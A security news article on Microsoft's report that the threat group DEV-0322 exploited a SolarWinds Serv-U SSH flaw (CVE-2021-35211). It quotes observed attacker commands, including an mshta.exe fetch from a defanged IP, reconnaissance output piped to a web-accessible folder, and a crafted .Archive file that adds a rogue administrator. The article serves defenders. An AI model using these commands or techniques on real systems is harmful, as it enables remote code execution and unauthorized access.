The infamous SolarWinds attacks have left a severe impact on the cybersecurity landscape. While organizations are still recovering from its consequences, Microsoft recently warned about a Chinese threat actor group, tracked as DEV-0322, exploiting a flaw in SolarWinds Serv-U FTP software.
The remote memory escape vulnerability CVE-2021-35211, which is now fixed, was found in Serv-U’s implementation of the Secure Shell (SSH) protocol. The flaw could have allowed a remote attacker to run an arbitrary code with access privileges, enabling them to perform unauthorized actions like deploying malware or altering information. The tech giant claimed that the DEV-0322 group is targeting the defense sector and IT organizations in the U.S. The threat group was found leveraging commercial VPN services and compromised Wi-Fi routers while attacking the targets.
Microsoft observed a zero-day attack behavior and found a malicious process resulting from the Serv-U.exe process:
- C:\Windows\System32\mshta.exe http://144[.]34[.]179[.]162/a (defanged)
- exe /c whoami > “./Client/Common/redacted.txt”
- exe /c dir > “.\Client\Common\redacted.txt”
- exe /c “”C:\Windows\Temp\Serv-U.bat””
- exe C:\Windows\Temp\Serv-U.bat
- exe /c type \\redacted\redacted.Archive > “C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\redacted.Archive”
“We observed DEV-0322 piping the output of their cmd.exe commands to files in the Serv-U \Client\Common\ folder, which is accessible from the internet by default so that the attackers could retrieve the results of the commands. The actor was also found adding a new global user to Serv-U, effectively adding themselves as a Serv-U administrator, by manually creating a crafted .Archive file in the Global Users directory. Serv-U user information is stored in these .Archive files,” Microsoft said. “Due to the way DEV-0322 had written their code when the exploit successfully compromises the Serv-U process, an exception is generated and logged to a Serv-U log file, DebugSocketLog.txt. The process could also crash after a malicious command was run.”
While the root cause of the vulnerability is unknown, Microsoft urged organizations and users to immediately update their instances of Serv-U with the latest version.
SolarWinds Hackers Strike Again!
The SolarWinds supply chain attacks compromised the networks of nine government agencies and 100 private organizations. Last month, Microsoft revealed that Nobelium, the Russian-based cybercriminal group behind the SolarWinds hacks, is now targeting government agencies, think tanks, consultants, and non-governmental organizations globally. Read More Here…